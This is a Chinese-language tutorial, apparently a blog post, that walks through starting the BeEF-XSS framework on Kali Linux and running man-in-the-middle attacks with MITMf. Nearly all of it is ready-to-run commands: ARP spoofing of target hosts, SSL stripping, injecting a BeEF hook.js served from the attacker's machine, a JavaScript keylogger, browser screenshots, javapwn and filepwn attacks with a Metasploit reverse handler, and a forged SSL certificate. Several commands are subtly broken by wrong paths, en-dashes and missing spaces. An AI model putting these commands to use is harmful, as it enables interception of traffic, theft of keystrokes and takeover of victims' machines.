Kali Linux启动Beef-Xss漏洞利用框架教程:

注:首先将默认浏览器的IP地址设为本机回环代理地址,IP格式:127.0.0.1,Port:8080,勾选Socks5,勾选Remote DNS,设置完成!
root@kali:~# cd /user/share/beef-xss
root@kali:~# beef-xss
注:开启后自动跳转到Beef登录界面,链接:http://127.0.0.1/3000/ui/authentication,默认用户为:beef密码为:beef,通过浏览器浏览网页,Beef会通过Cookies会话截取各指纹,插件等详细信息!
root@kali:~# git clone https://github.com/byt3bl33d3r/MITMf.git /root/mitmf/
root@kali:~# cd /root/mitmf/
root@kali: /root/mitmf# python mitmf.py -i wlan0

嗅探SSL协议传输数据包:

root@kali: /root/mitmf# python mitmf.py -i eth0 --hsts --spoof --arp --gateway 10.0.0.1 --target 10.0.0.18

Screenshotter模块对目标浏览器截屏:

root@kali: /root/mitmf# python mitmf.py -i eth0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.100 --screen

Inject框架模块注入功能:

root@kali: /root/mitmf# mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.1.129 --inject --html-url http://www.freebuf.com

注入js:

root@kali: /root/mitmf# mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.1.129 --inject --js-url http://linvex.xxx.cn/test.js

键盘记录js:

root@kali: /root/mitmf# mitmf -i eth0 --spoof –-arp  –-gateway 192.168.1.1 –-target 192.168.1.114 --jskeylogger

Miti中间人攻击:

root@kali: /root/mitmf# mitmf --spoof --arp -i eth0 --gateway 192.168.1.1 --target 192.168.1.114 --inject –js-url http://192.168.1.110:3000/hook.js

开启Metasploit:

root@kali:~# msfconsole

载入msgrpc模块:

msf5 > load msgrpc Pass=abc123

利用javapwn模块攻击:

root@kali: /root/mitmf# mitmf -i eth0 --spoof --gateway 192.168.217.2 --target 192.168.217.129 --javapwn --msfip 192.168.1.100
msf5 > use exploit/multi/handler
msf5 (exploit/multi/handler) > set LHOST 192.168.217.137
msf5 (exploit/multi/handler) > set LPORT 1447
msf5 (exploit/multi/handler) > run

注入到html页面:

root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --html-url http://192.168.1.107:3000/demos/butcher/index.html

注入js与beef-xss结合:

root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --inject --js-url http://192.168.1.107:3000/hook.js

Screenshotter模块对目标浏览器截屏:

root@kali: /root/mitmf# ./mitmf -i wlan0 --spoof --arp --gateway 192.168.1.1 --target 192.168.1.104 --screen

中间人钓鱼:

root@kali: /root/mitmf# ./mitmf.py --iface eth0 --spoof --gateway 192.168.1.1 --target 192.168.1.200 --filepwn

伪造SSL MITIM证书:

root@kali:~# openssl genrsa −out etter.ssl.crt 1024
root@kali:~# openssl req −new−keyetter.ssl.crt −out tmp.csr
root@kali:~# openssl x509 −req −days 1825 −in tmp.csr −signkey etter.ssl.crt−out tmp.new
root@kali:~# cat tmp.new>>etter.ssl.crt
root@kali:~# rm −f tmp.newtmp.csr

监听网卡流量:

root@kali:~# tcpdump -i wlan0

监听回环流量:

root@kali:~# tcpdump -i lo

你可能感兴趣的:(Kali Linux启动Beef-Xss漏洞利用框架教程:)